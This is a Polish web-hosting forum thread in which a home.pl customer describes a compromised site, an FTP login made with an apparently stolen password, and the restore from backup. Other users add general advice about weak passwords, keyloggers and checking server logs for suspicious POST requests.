Jesli chodzi o wordpressa - to stały na nim 2 blogi (instalowane przeze mnie) i 1 blog z autoinstalatora.

[maniack 403]

.

Edytowano Wrzesień 13, 2017 przez maniack (zobacz historię edycji)

[ironman 0]

Czyli jest taka mozliwosc ze chcieli zyskac tylko ruch do swoich serwerow - w sposob niewidoczny dla osob korzystajacych z moich stron ?!
Albo i wykorzystac serwer w bardziej nieciekawy sposob.

[ironman 0]

W sumie jeśli chodzi o taka firmę jak home.pl z takim kapitałem itp. - to ktoś z Pomocy i/lub administrator powinien być dostępny w święta.

 

"Całodobowe, telefoniczne Biuro Obsługi Klienta (w skrócie BOK). Jako jedyna firma hostingowa na rynku świadczymy rzeczywiste wsparcie Klienta przez 24 godziny na dobę i wszystkie dni w tygodniu, przez cały rok."

 

Mam dopiero pierwszy poważny problem z serwerem i pomoc akurat niedostępna :(

 

Nigdy na nich nie narzekałem aż do teraz - przynajmniej żeby mieli w panelu administracyjnym opcje przywracania kopii to nie byloby problemu.

Edytowano Kwiecień 1, 2013 przez ironman (zobacz historię edycji)

[tgx 575]

Nigdy na nich nie narzekałem aż do teraz - przynajmniej żeby mieli w panelu administracyjnym opcje przywracania kopii to nie byloby problemu.

 

Co za problem przywrócić kopię przez ftp?

[Gość nrm]

Co za problem przywrócić kopię przez ftp?

 

Jeżeli przyjąć, że jest statystycznym klientem - to problem, bo to oznacza, że jej lokalnie nie posiada

[tgx 575]

Jeżeli przyjąć, że jest statystycznym klientem - to problem, bo to oznacza, że jej lokalnie nie posiada

 

Chciałem delikatnie uświadomić kolegę, że o czymś zapomniał

[ironman 0]

Witam.

 

Mam kopię, tylko pare miesięcy nie świeżą.
Po za tym przywrócenie zawartości mojego ftp - to pól dnia kopiowania plików (sa z reguły nieduże po za zdjeciami ale jest ich mnóstwo).

 

Sprostowanie odnośnie firmy home.pl - jednak już ktoś jest przy telefonie i sprawę załatwiłem - zleciłem backup, dowiedziałem się w jaki sposób, z jakiego adres ip i dokładnie kiedy zostałem zaatakowany.

Okazało się że ktoś sie zalogował przez ftp - więc w jakiś sposób musiał zwinąć mi hasło (zapewne trojan)./

 

Kopia już przywrócona

Edytowano Kwiecień 1, 2013 przez ironman (zobacz historię edycji)

[Łukasz Ostrowski 593]

@up

Albo słabe hasło..

[ironman 0]

Oj na pewno nie - prawie 20 znaków - i nie sa to wyrazy - tylko liczby male i duze litery i znaki specjalne.

[Gość nrm]

@up

Albo słabe hasło..

 

Niee. Oczywiście jaknajbardziej możliwe ale to na ogół są jakies syfy na windowsa. Niektóre z nich wyłapują z wszystkiego (!!!) co wklepujesz klawiaturą określone ciągi znaków i przesyłają gdzie trzeba. Dlatego pisałem, że po fali gdzie nr 1 był TotaCommander teraz najcześciej jest to jednak robione poziom wyżej

[regdos 1848]

Należy sprawdzić kiedy pliki zostały zmienione a potem zainteresować się logami serwera www w tym okresie czasu i sprawdzać dziwne wywołania, szczególnie metodą POST.

[admin@prohost.pl 74]

Testowałem kiedyś sobie jak szybko jest w stanie ktoś się dostać przez ftp nie znając użytkownika i hasła przy łatwym haśle.

 

Przyszedł sobie bocik i w 4 próbie zgadł dane do ftp Hasło było 123456

 

Mając łatwe hasło na ftp można mieć problem nawet zanim zadziała antybruteforce.